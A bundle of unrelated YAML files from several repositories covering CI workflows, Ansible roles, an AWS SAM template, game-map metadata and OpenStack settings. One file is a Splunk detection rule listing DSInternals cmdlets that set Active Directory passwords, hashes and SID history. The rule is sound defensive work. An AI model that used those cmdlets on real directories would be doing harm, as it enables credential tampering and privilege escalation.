bgpaas_session_attributes:
$ref: types.json#/definitions/BgpSessionAttributes
description: BGP peering session attributes.
operations: CRUD
presence: required
bgpaas_shared:
default: false
description: True if only one BGP router needs to be created. Otherwise, one
BGP router is created for each VMI
operations: CRUD
presence: optional
type: boolean
bgpaas_suppress_route_advertisement:
description: True when server should not advertise any routes to the client
i.e. the client has static routes (typically a default) configured.
operations: CRUD
presence: optional
type: boolean
required:
- autonomous_system
- bgpaas_ip_address
- bgpaas_session_attributes
type: object
|
schema/yaml/bgp-as-a-service-schema.yml
|
---
name: CI
on: [push]
jobs:
markdown_lint:
name: "Lint Markdown"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: head
- name: Install mdl
run: gem install mdl
- name: Lint markdown
run: mdl --ignore-front-matter --style .mdl_style.rb ./
markdown_link_check:
name: "Check Markdown links"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Check links
uses: gaurav-nelson/github-action-markdown-link-check@1.0.13
with:
use-verbose-mode: "yes"
hugo:
name: "Hugo build"
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
- name: Build
run: hugo --minify
html-proofer-internal-links:
name: "HTML proofer internal links"
runs-on: ubuntu-latest
needs: hugo
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
- name: Setup Ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: head
- name: Install html-proofer
run: gem install html-proofer
- name: Build
run: hugo --minify
- name: Run html-proofer
# swap URLs
# - adjust for base URL (a-fully-on-chain-reading-group)
# Ignore internal links to base URL
# Only check internal links
run: |
htmlproofer ./public \
--check-favicon \
--check-html \
--check-img-http \
--disable-external \
--url-swap "^/a-fully-on-chain-reading-group/:/" \
--url-ignore '/a-fully-on-chain-reading-group'
html-proofer-external-links:
name: "HTML proofer external links"
runs-on: ubuntu-latest
needs: hugo
steps:
- name: Checkout
uses: actions/checkout@v2
with:
submodules: 'recursive'
- name: Setup Hugo
uses: peaceiris/actions-hugo@v2
with:
hugo-version: 'latest'
extended: true
- name: Setup Ruby
uses: actions/setup-ruby@v1
- name: Install html-proofer
run: gem install html-proofer
- name: Build
run: hugo --minify
- name: Run html-proofer
# swap URLs
# - adjust for internal links with fqdn (http://christinaLast.github.io/a-fully-on-chain-reading-group)
# - Adjust edit and tree paths on GitHub to current branch (*/edit/main, */tree/main)
# Only check external links
run: |
htmlproofer ./public \
--check-favicon \
--check-html \
--check-img-http \
--enforce-https \
--external-only \
--url-swap "^^https\://ChristinaLast.github.io/a-fully-on-chain-reading-group/:/,/edit/main:/edit/$(git branch --show-current),/tree/main:/tree/$(git branch --show-current)" \
|
.github/workflows/ci.yaml
|
client:
autoDeserialize:
receiveBearerTokenAliasExample:
- '""'
receiveBearerTokenExample:
- '{"value":" space"}'
- '{"value":"space "}'
- '{"value":"with space"}'
- '{"value":""}'
- '{"value":"#"}'
- '{"value":" "}'
- '{"value":"("}'
- '{"value":"="}'
- '{"value":"=a"}'
receiveDateTimeAliasExample:
- '""'
- '"4/3/2018"'
- '"1523040070"'
- '"2017-01-02T03:04:05.0000000000Z"'
- '"2017-01-02T04:04:05.000000000+01:00[Europe/Berlin]"'
receiveDateTimeExample:
- '{"value":"4/3/2018"}'
- '{"value":"1523040070"}'
- '{"value":"2017-01-02T03:04:05.0000000000Z"}'
- '{"value":"2017-01-02T04:04:05.000000000+01:00[Europe/Berlin]"}'
receiveDoubleExample:
- '{"value":"1.23"}'
- '{"value":"nan"}'
receiveDoubleAliasExample:
- '"nan"'
- '"NAN"'
- '"infinity"'
- '"-infinity"'
- '"+Infinity"'
# We do not round trip enums, or check for illegal characters
receiveEnumExample:
- '"THIS_IS_UNKNOWN"'
- '"!!!"'
- '"one-hundred"'
receiveMapEnumExampleAlias:
- '{"ONE": "", "TWO": "", "UNKNOWN_VARIANT": ""}'
# We do not encode boolean keys correctly, we encode them as True/False instead of true/false
receiveMapBooleanAliasExample:
- '{"true": true}'
# We do not fail on duplicate map keys
receiveMapDoubleAliasExample:
- '{"10": true, "10e0": false}'
- '{"10": true, "10.0": false}'
# python int range is over-permissive compared to spec
receiveIntegerExample:
- '{"value":-2147483649}'
- '{"value":2147483648}'
receiveRidAliasExample:
- '"badString"'
- '"ri.service.CAPLOCK.type.name"'
- '"ri.service.instance.-123.name"'
- '"ri..instance.type.noService"'
- '"ri.service.instance.type."'
- '"id.bad.id.class.b.name"'
- '"ri:service::instance:type:name"'
- '"ri.service.instance.type.name!@#"'
- '"ri.service(name)..folder.foo"'
- '""'
receiveRidExample:
- '{"value":""}'
- '{"value":"badString"}'
- '{"value":"ri.service.CAPLOCK.type.name"}'
- '{"value":"ri.service.instance.-123.name"}'
- '{"value":"ri..instance.type.noService"}'
- '{"value":"ri.service.instance.type."}'
- '{"value":"id.bad.id.class.b.name"}'
- '{"value":"ri:service::instance:type:name"}'
- '{"value":"ri.service.instance.type.name!@#"}'
- '{"value":"ri.service(name)..folder.foo"}'
receiveSafeLongAliasExample:
- "-9007199254740992"
- '9007199254740992'
receiveSafeLongExample:
- '{"value":-9007199254740992}'
- '{"value":9007199254740992}'
receiveSetStringExample:
- '{"value":["a","a"]}'
receiveUuidAliasExample:
- '""'
- '"80e6dd13-5f42-4e33-ad18"'
receiveUuidExample:
- '{"value":""}'
- '{"value":"80e6dd13-5f42-4e33-ad18"}'
# Optional arguments are ordered differently, causing the wrong parameters to be passed
singleHeaderService:
headerOptionalOfString:
- 'null'
- '"foo"'
singlePathParamService:
pathParamBoolean:
- 'true'
- 'false'
pathParamString:
- '""' # The server doesn't accept empty path params
pathParamAliasString:
- '""' # The server doesn't accept empty path params
singleQueryService: {}
|
resources/ignored_test_cases.yml
|
main:
# - title: "Home"
# url: https://diogocaetanogarcia.github.io/minimal-mistakes/
# - title: "Point clouds"
# url: /point-clouds/
# - title: "Video compression"
# url: /video-compression/
# - title: "Miscellaneous"
# url: /miscellaneous/
# - title: "Software"
# url: /software/
- title: "Faculty"
url: /faculty/
- title: "Graduate students"
url: /grad-students/
- title: "Undergraduate students"
url: /undergrad-students/
- title: "Alumni"
url: /alumni/
projs:
- title: "Point clouds"
url: /point-clouds/
children:
- title: "Attribute compression"
url: /point-clouds-attribute-compression/
- title: "Geometry compression"
url: /point-clouds-geometry-compression/
- title: "Motion estimation"
url: /point-clouds-motion-estimation/
- title: "Region-of-interest/saliency"
url: /point-clouds-roi-saliency/
- title: "Super-resolution"
url: /point-clouds-super-resolution/
- title: "Image and video compression"
url: /video-compression/
children:
- title: "Learning-based image and video compression"
url: /video-compression-learning-based/
- title: "Wedges"
url: /video-compression-wedges/
- title: "Light field image compression"
url: /video-compression-light-field-image-compression/
- title: "Video encoding complexity reduction"
url: /video-compression-video-encoding-complexity-reduction/
- title: "Wyner-Ziv coding"
url: /video-compression-wyner-ziv-coding/
- title: "Enhancement and super-resolution"
url: /video-compression-enhancement-super-resolution/
- title: "Scanned document compression"
url: /video-compression-scanned-document-compression/
- title: "Transcoding"
url: /video-compression-transcoding/
- title: "Motion estimation and intra prediction"
url: /video-compression-motion-estimation-and-intra-prediction/
- title: "Brazilian digital TV standard"
url: /video-compression-brazilian-digital-tv-standard/
- title: "Image and video processing, analysis and synthesis"
url: /miscellaneous/
children:
- title: "JPEG detection"
url: /miscellaneous-jpeg-detection/
- title: "Recolorization"
url: /miscellaneous-recolorization/
- title: "Face spoofing detection"
url: /miscellaneous-face-spoofing-detection/
- title: "Heart-rate measurement"
url: /miscellaneous-heart-rate-measurement/
- title: "Sonar multibeam echo sounding"
url: /miscellaneous-sonar-multibeam-echo-sounding/
# - title: "Quick-Start Guide"
# url: https://mmistakes.github.io/minimal-mistakes/docs/quick-start-guide/
# - title: "About"
# url: https://mmistakes.github.io/minimal-mistakes/about/
# - title: "Sample Posts"
# url: /year-archive/
# - title: "Sample Collections"
# url: /collection-archive/
# - title: "Sitemap"
# url: /sitemap/
|
_data/navigation.yml
|
language: cpp
dist: xenial
# see https://github.com/nlohmann/json/blob/develop/.travis.yml
matrix:
include:
# g++-8
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8']
# g++-8 32bit
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
- os: linux
compiler: gcc
env:
- COMPILER=g++-8
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
- CXXFLAGS="-m32"
- LDFLAGS="-m32"
addons:
apt:
sources: ['ubuntu-toolchain-r-test']
packages: ['g++-8-multilib', 'linux-libc-dev:i386']
# clang++-6.0
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=11"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=14"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
- os: linux
compiler: clang
env:
- COMPILER=clang++-6.0
- CMAKE_OPTIONS="-DNB_sanitizer=ON -DNB_cxx_standard=17"
addons:
apt:
sources: ['ubuntu-toolchain-r-test', 'llvm-toolchain-xenial-6.0']
packages: ['g++-6', 'clang-6.0',]
install:
- if [[ "${CODE_COVERAGE}" == "true" ]]; then gem install coveralls-lcov ; fi
script:
# make sure CXX is correctly set
- if [[ "${COMPILER}" != "" ]]; then export CXX=${COMPILER}; fi
# show OS/compiler version
- uname -a
- $CXX --version
# build
- cd build
- cmake .. -DCMAKE_BUILD_TYPE=Release ${CMAKE_OPTIONS} && cmake --build . -- -j2
# check file
- file ./nb
# run test
- ./nb
# coverage
- |
if [[ "${CODE_COVERAGE}" = "true" ]]; then
cmake --build . --target lcov
fi
|
.travis.yml
|
name: Continuous Integration
on:
push:
branches:
- trunk
- releases/*
pull_request:
branches:
- trunk
- releases/*
env:
DOTNET_SKIP_FIRST_TIME_EXPERIENCE: true
DOTNET_CLI_TELEMETRY_OPTOUT: true
jobs:
gitversion:
name: Calculate SemVer
runs-on: ubuntu-latest
outputs:
fullSemVer: ${{ steps.gitversion.outputs.fullSemVer }}
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
with:
fetch-depth: 0
- name: Install GitVersion
uses: gittools/actions/gitversion/setup@v0.9.9
with:
versionSpec: 5.x
- name: Determine Version
id: gitversion
uses: gittools/actions/gitversion/execute@v0.9.9
with:
useConfigFile: true
configFilePath: gitversion.yml
build:
name: Build & Package
needs: gitversion
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
- name: Setup .NET
uses: actions/setup-dotnet@v1.8.0
with:
dotnet-version: 5.0.x
- name: Restore dependencies
run: dotnet restore
- name: Build
run: dotnet build --no-restore -c Release -p:Version=${{ needs.gitversion.outputs.fullSemVer }}
- name: Pack
run: dotnet pack --no-build -c Release -o packages -p:PackageVersion=${{ needs.gitversion.outputs.fullSemVer }} --include-symbols -p:SymbolPackageFormat=snupkg
- name: Upload packages artifacts
uses: actions/upload-artifact@v2
with:
name: packages
path: packages
test:
name: Run unit tests
needs: gitversion
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2.3.4
- name: Setup .NET
uses: actions/setup-dotnet@v1.8.0
with:
dotnet-version: 5.0.x
- name: Restore dependencies
run: dotnet restore
- name: Build
run: dotnet build --no-restore -c Release -p:Version=${{ needs.gitversion.outputs.fullSemVer }}
- name: Install AzCopy
uses: kheiakiyama/install-azcopy-action@v1.0.3
with:
version: v10
- name: Determine test run filter
uses: haya14busa/action-cond@v1.0.2
id: test_run_filter
with:
if_true: 'Category=UnitTest|Category=IntegrationTest'
if_false: 'Category=UnitTest'
cond: ${{ github.event.sender.login != 'dependabot[bot]' && ( github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository ) }}
- name: Test
run: |
dotnet test --no-build -c Release \
--settings coverlet.runsettings \
--logger "junit;LogFilePath=../../tests-results/{assembly}.junit.xml" \
--collect "XPlat Code Coverage" \
--results-directory tests-results \
--filter "$TEST_FILTER"
env:
TEST_FILTER: ${{ steps.test_run_filter.outputs.value }}
Email:Provider:Parameters:Key: ${{ secrets.SENDGRIDKEY }}
ConnectionStrings:ConnectionStringFromAppSettings: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:Providers:CustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:Stores:CustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
Storage:ScopedStores:ScopedCustomConnectionString:ConnectionString: ${{ secrets.AZURESTORAGETESTSCONNECTIONSTRING }}
AzCopy10Command: azcopy_v10
- name: Install ReportGenerator
run: dotnet tool install --global dotnet-reportgenerator-globaltool --version 4.8.8
- name: Merge lcov files
run: reportgenerator -reports:tests-results/**/*.info -targetdir:tests-results -reporttypes:lcov
- name: Upload tests results artifacts
uses: actions/upload-artifact@v2
with:
name: tests-results
path: tests-results
if: ${{ always() }}
- name: Publish unit tests results
uses: EnricoMi/publish-unit-test-result-action@v1.17
if: >
always() &&
github.event.sender.login != 'dependabot[bot]' &&
( github.event_name != 'pull_request' || github.event.pull_request.head.repo.full_name == github.repository )
with:
files: tests-results/*.junit.xml
check_name: Unit tests results
- name: Upload coverage to Coveralls
uses: coverallsapp/github-action@v1.1.2
with:
github-token: ${{ secrets.GITHUB_TOKEN }}
path-to-lcov: ./tests-results/lcov.info
|
.github/workflows/continuous-integration.yml
|
---
- name: load version vars
with_first_found:
- '../vars/versions/{{ cm_version }}.yml'
- ../vars/versions/main.yml
include_vars: '{{ item }}'
- name: assert version vars
assert:
that:
- "cm_redis_sha256sum not in (None, '')"
- name: create download directory
file:
state: directory
mode: 'u=rwx,go=rx'
dest: '{{ cm_download_dir }}'
- name: download Camunda-Modeler
get_url:
url: '{{ cm_download_url }}/{{ cm_redis_filename }}'
dest: '{{ cm_download_dir }}/{{ cm_redis_filename }}'
sha256sum: '{{ cm_redis_sha256sum }}'
force: no
mode: 'u=rw,go=r'
- name: "create {{ cm_install_dir }} installation directory"
become: yes
file:
state: directory
owner: root
group: root
mode: 'u=rwx,go=rx'
dest: '{{ cm_install_dir }}'
- name: install unarchive dependencies (zypper)
become: yes
zypper:
name:
- gzip
- tar
state: present
when: ansible_pkg_mgr == 'zypper'
- name: install Camunda-Modeler
become: yes
unarchive:
src: '{{ cm_download_dir }}/{{ cm_redis_filename }}'
remote_src: yes
extra_opts: '--strip-components=1'
dest: '{{ cm_install_dir }}'
owner: root
group: root
mode: 'u=rwx,go=rx'
# Set Camunda-Modeler facts
- name: create Ansible facts.d directory
become: yes
file:
state: directory
dest: /etc/ansible/facts.d
owner: root
group: root
mode: 'u=rwx,go=rx'
- name: install Camunda-Modeler facts
become: yes
template:
src: facts.j2
dest: /etc/ansible/facts.d/camundamodeler.fact
owner: root
group: root
mode: 'u=rw,go=r'
- name: re-read facts
setup:
filter: ansible_local
- name: install Camunda-Modeler link
become: yes
file:
state: link
src: '{{ cm_install_dir }}/camunda-modeler'
dest: '/usr/local/bin/camunda-modeler'
- name: install Camunda-Modeler desktop file
become: yes
template:
src: camunda-modeler.desktop.j2
dest: '/usr/share/applications/camunda-modeler.desktop'
owner: root
group: root
mode: 'u=rw,go=r'
|
tasks/main.yaml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2018-10-16 18:43"
game: "Unreal Tournament"
name: "CTF-Watercourse"
author: "zaupau32"
description: "None"
releaseDate: "2006-08"
attachments:
- type: "IMAGE"
name: "CTF-Watercourse_shot_4.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_4.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_3.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_3.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_1.png"
- type: "IMAGE"
name: "CTF-Watercourse_shot_2.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/CTF-Watercourse_shot_2.png"
originalFilename: "ctf-watercourse.zip"
hash: "90425b51f500bb5de934638a6f9cd2c3e562064c"
fileSize: 441164
files:
- name: "CTF-Watercourse.unr"
fileSize: 1413687
hash: "e08f7cb6d6bc926b114e835acd28bfa1a426a6e7"
otherFiles: 4
dependencies: {}
downloads:
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/ctf-watercourse.zip"
main: true
repack: false
state: "OK"
- url: "http://www.ut-files.com/index.php?dir=Maps/CTF/MapsW/&file=ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "http://medor.no-ip.org/index.php?dir=Maps/CTF&file=ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "http://uttexture.com/UT/Downloads/Maps/CTF/MapsW/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/9/0/425b51/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/Capture%20The%20Flag/W/9/0/425b51/ctf-watercourse.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "Capture The Flag"
title: "Guarded Watercourse"
playerCount: "4-8"
themes:
Industrial: 0.7
Ancient: 0.3
bots: true
|
content/Unreal Tournament/Maps/Capture The Flag/W/9/0/425b51/ctf-watercourse_[90425b51].yml
|
AWSTemplateFormatVersion: '2010-09-09'
Transform: 'AWS::Serverless-2016-10-31'
Description: An AWS Lambda application that uses Amazon CloudWatch Logs, AWS X-Ray, and AWS CloudFormation custom resources.
Globals:
Function:
Runtime: nodejs12.x
Handler: index.handler
Tracing: Active
Layers:
- !Ref libs
Resources:
bucket:
Type: AWS::S3::Bucket
DeletionPolicy: Retain
role:
Type: AWS::IAM::Role
Properties:
AssumeRolePolicyDocument:
Version: "2012-10-17"
Statement:
-
Effect: Allow
Principal:
Service:
- lambda.amazonaws.com
Action:
- sts:AssumeRole
ManagedPolicyArns:
- arn:aws:iam::aws:policy/AWSXrayFullAccess
- arn:aws:iam::aws:policy/AmazonS3FullAccess
- arn:aws:iam::aws:policy/CloudWatchLogsFullAccess
- arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole
- arn:aws:iam::aws:policy/service-role/AWSLambdaRole
Path: /service-role/
processor:
Type: AWS::Serverless::Function
Properties:
CodeUri: processor/.
Description: Retrieve logs and trace for errors.
Timeout: 40
Role: !GetAtt role.Arn
Environment:
Variables:
bucket: !Ref bucket
libs:
Type: AWS::Serverless::LayerVersion
Properties:
LayerName: error-processor-lib
Description: Dependencies for the error-processor sample app.
ContentUri: lib/.
CompatibleRuntimes:
- nodejs12.x
randomerror:
Type: AWS::Serverless::Function
Properties:
CodeUri: random-error/.
Description: Generate errors.
Timeout: 600
Role: !GetAtt role.Arn
primer:
Type: AWS::Serverless::Function
Properties:
InlineCode: |
var aws = require('aws-sdk')
var response = require('cfn-response')
exports.handler = async function(event, context) {
console.log("REQUEST RECEIVED:\n" + JSON.stringify(event))
// For Delete requests, immediately send a SUCCESS response.
if (event.RequestType == "Delete") {
return await response.send(event, context, "SUCCESS")
}
var responseStatus = "FAILED"
var responseData = {}
var functionName1 = event.ResourceProperties.FunctionName1
var functionName2 = event.ResourceProperties.FunctionName2
var functionName3 = event.ResourceProperties.FunctionName3
var logGroup1 = "/aws/lambda/" + functionName1
var logGroup2 = "/aws/lambda/" + functionName2
var logGroup3 = "/aws/lambda/" + functionName3
var lambda = new aws.Lambda()
var logs = new aws.CloudWatchLogs()
try {
// Invoke other functions and wait for log groups to populate
await Promise.all([
lambda.invoke({ FunctionName: functionName2 }).promise(),
lambda.invoke({ FunctionName: functionName3 }).promise(),
new Promise(resolve => setTimeout(resolve, 10000))
])
// Set log retention on all log groups
await Promise.all([
logs.putRetentionPolicy({logGroupName: logGroup1, retentionInDays: 3 }).promise(),
logs.putRetentionPolicy({logGroupName: logGroup2, retentionInDays: 3 }).promise(),
logs.putRetentionPolicy({logGroupName: logGroup3, retentionInDays: 3 }).promise()
])} catch(err) {
responseData = {Error: "SDK call failed"}
console.log(responseData.Error + ":\n", err)
return await response.send(event, context, responseStatus, responseData)
}
responseStatus = "SUCCESS"
return await response.send(event, context, responseStatus, responseData)
}
Description: Invoke a function to create a log stream.
Role: !GetAtt role.Arn
Timeout: 30
primerinvoke:
Type: AWS::CloudFormation::CustomResource
Version: "1.0"
Properties:
ServiceToken: !GetAtt primer.Arn
FunctionName1: !Ref primer
FunctionName2: !Ref randomerror
FunctionName3: !Ref processor
subscription:
Type: AWS::Logs::SubscriptionFilter
DependsOn: cloudwatchlogspermission
Properties:
LogGroupName: !Join [ "/", [ "/aws/lambda", !Ref randomerror ] ]
FilterPattern: ERROR
DestinationArn: !GetAtt processor.Arn
cloudwatchlogspermission:
Type: AWS::Lambda::Permission
# Wait for randomerror to be invoked to ensure that the log stream exists.
DependsOn: primerinvoke
Properties:
FunctionName: !GetAtt processor.Arn
Action: lambda:InvokeFunction
Principal: !Join [ ".", [ "logs", !Ref "AWS::Region", "amazonaws.com" ] ]
SourceAccount: !Ref AWS::AccountId
|
documents/aws-lambda-developer-guide/sample-apps/error-processor/template.yml
|
---
- name: Pre hooks
include: '{{ lookup("task_src", "roundcube/pre_main.yml") }}'
# ---- Environment ----
- name: Get version of current Roundcube installation
command: sed -n "s/^define('RCMAIL_VERSION', '\(.*\)');/\1/p" \
{{ roundcube__git_checkout }}/program/include/iniset.php
args:
warn: False
changed_when: False
failed_when: False
register: roundcube__register_version
tags: [ 'role::roundcube:database' ]
# this task is necessary, to trigger proper database upgrades after
# updating the role to v0.2.0 because the default installation path
# has changed.
- name: Get version of deprecated Roundcube installation on role upgrade
command: sed -n "s/^define('RCMAIL_VERSION', '\(.*\)');/\1/p" \
/srv/www/roundcube/sites/{{
roundcube__domain if roundcube__domain is string
else roundcube__domain[0] }}/public/program/include/iniset.php
args:
warn: False
changed_when: False
failed_when: False
register: roundcube__register_version_old
when: (not roundcube__register_version.stdout|d()) and
(not roundcube__git_checkout == '/srv/www/roundcube/sites/'
+ (roundcube__domain if roundcube__domain is string
else roundcube__domain[0]) + '/public')
tags: [ 'role::roundcube:database' ]
# ---- Deployment ----
- name: Install pre-requisite packages for Roundcube
package:
name: '{{ q("flattened", (roundcube__base_packages
+ roundcube__packages)) }}'
state: 'present'
register: roundcube__register_packages
until: roundcube__register_packages is succeeded
tags: [ 'role::roundcube:pkg' ]
- include: deploy_roundcube.yml
tags: [ 'role::roundcube:deployment' ]
# ---- Configuration ----
- name: Make sure database directory exists
file:
path: '{{ roundcube__git_checkout }}/{{ roundcube__database_map[roundcube__database].dbname | dirname }}'
state: directory
owner: '{{ roundcube__user }}'
group: '{{ roundcube__group }}'
mode: '0750'
when: roundcube__database_map[roundcube__database].dbtype == 'sqlite'
tags: [ 'role::roundcube:database' ]
- include: configure_mysql.yml
when: roundcube__database_map[roundcube__database].dbtype == 'mysql'
tags: [ 'role::roundcube:database' ]
- name: Configure Roundcube
template:
src: 'srv/www/sites/config.inc.php.j2'
dest: '{{ roundcube__git_checkout + "/config/config.inc.php" }}'
owner: 'root'
group: '{{ roundcube__group }}'
mode: '0640'
tags: [ 'role::roundcube:config' ]
- name: Update database schema
command: 'php bin/updatedb.sh --package=roundcube --dir={{ roundcube__git_checkout }}/SQL'
args:
chdir: '{{ roundcube__git_checkout }}'
become: True
become_user: '{{ roundcube__user }}'
register: roundcube__register_updatedb
changed_when: roundcube__register_updatedb.stdout|d()
when: (roundcube__register_version.stdout|d() and
roundcube__git_version is version_compare(roundcube__register_version.stdout, '>')) or
(roundcube__register_version_old is not skipped and
roundcube__register_version_old.stdout|d())
tags: [ 'role::roundcube:database' ]
- name: Post hooks
include: '{{ lookup("task_src", "roundcube/post_main.yml") }}'
|
repo-github/debops@debops/ansible/roles/debops.roundcube/tasks/main.yml
|
author: <NAME>, Splunk
date: '2020-11-03'
description: This detection identifies illegal setting of credentials via DSInternals
modules.
eli5: This detection identifies use of DSInternals modules that set credentials illegaly.
how_to_implement: You must be ingesting Windows Security logs from devices of interest,
including the event ID 4688 with enabled command line logging.
id: d5ef590f-9bde-49eb-9c63-2f5b62a65b9c
known_false_positives: None identified.
name: Setting Credentials via DSInternals modules
references:
- https://github.com/MichaelGrafnetter/DSInternals
search: '| from read_ssa_enriched_events()
| eval timestamp=parse_long(ucast(map_get(input_event, "_time"), "string", null)),
process_name=ucast(map_get(input_event, "process_name"), "string", null), process_path=ucast(map_get(input_event,
"process_path"), "string", null), cmd_line=ucast(map_get(input_event, "process"),
"string", null), parent_process_name=ucast(map_get(input_event, "parent_process_name"),
"string", null) | where cmd_line != null AND ( match_regex(cmd_line, /(?i)Add-ADDBSidHistory/)=true
OR match_regex(cmd_line, /(?i)Add-ADReplNgcKey/)=true OR match_regex(cmd_line, /(?i)Set-ADDBAccountPassword/)=true
OR match_regex(cmd_line, /(?i)Set-ADDBAccountPasswordHash/)=true OR match_regex(cmd_line,
/(?i)Set-ADDBBootKey/)=true OR match_regex(cmd_line, /(?i)Set-SamAccountPasswordHash/)=true
OR match_regex(cmd_line, /(?i)Set-AzureADUserEx/)=true )
| eval start_time = timestamp, end_time = timestamp, entities = mvappend( ucast(map_get(input_event,
"dest_user_id"), "string", null), ucast(map_get(input_event, "dest_device_id"),
"string", null)), body = "TBD" | into write_ssa_detected_events();'
tags:
asset_type: Windows
cis20:
- CIS 16
- CIS 20
kill_chain_phases:
- Actions on Objectives
mitre_technique_id:
- T1068
- T1078
- T1098
nist:
- PR.AC
- PR.IP
product:
- UEBA for Security Cloud
required_fields:
- dest_device_id
- process_name
- parent_process_name
- _time
- process_path
- dest_user_id
- process
risk_severity: high
security_domain: endpoint
type: SSA
version: 1
|
detections/endpoint/ssa___setting_credentials_via_dsinternals_modules.yml
|
composable_scenario: scenario009-multinode.yaml
deployed_server: true
network_isolation: false
enable_pacemaker: false
overcloud_ipv6: false
containerized_undercloud: true
containerized_overcloud: true
# This enables TLS for the undercloud which will also make haproxy bind to the
# configured public-vip and admin-vip.
undercloud_generate_service_certificate: false
undercloud_enable_validations: false
# This enables the deployment of the overcloud with SSL.
ssl_overcloud: false
# Centos Virt-SIG repo for atomic package
add_repos:
# NOTE(trown) The atomic package from centos-extras does not work for
# us but its version is higher than the one from the virt-sig. Hence,
# using priorities to ensure we get the virt-sig package.
- type: package
pkg_name: yum-plugin-priorities
- type: generic
reponame: quickstart-centos-paas
filename: quickstart-centos-paas.repo
baseurl: https://buildlogs.centos.org/centos/7/paas/x86_64/openshift-origin311/
- type: generic
reponame: quickstart-centos-virt-container
filename: quickstart-centos-virt-container.repo
baseurl: https://buildlogs.centos.org/centos/7/virt/x86_64/container/
includepkgs:
- atomic
priority: 1
extra_args: ''
container_args: >-
{% if release in ['pike','queens'] -%}
-e {{ overcloud_templates_path }}/environments/docker.yaml
{%- endif -%}
{% if release in ['ocata', 'pike', 'queens', 'rocky'] %}
-e {{ working_dir }}/containers-default-parameters.yaml
{% else %}
-e {{ working_dir }}/containers-prepare-parameter.yaml
{% endif %}
-e {{ overcloud_templates_path }}/environments/openshift.yaml
# NOTE(mandre) use container images mirrored on the dockerhub to take advantage
# of the proxy setup by openstack infra
docker_openshift_etcd_namespace: docker.io/tripleomaster
docker_openshift_cluster_monitoring_namespace: docker.io/tripleomaster
docker_openshift_cluster_monitoring_image: coreos-cluster-monitoring-operator
docker_openshift_configmap_reload_namespace: docker.io/tripleomaster
docker_openshift_configmap_reload_image: coreos-configmap-reload
docker_openshift_prometheus_operator_namespace: docker.io/tripleomaster
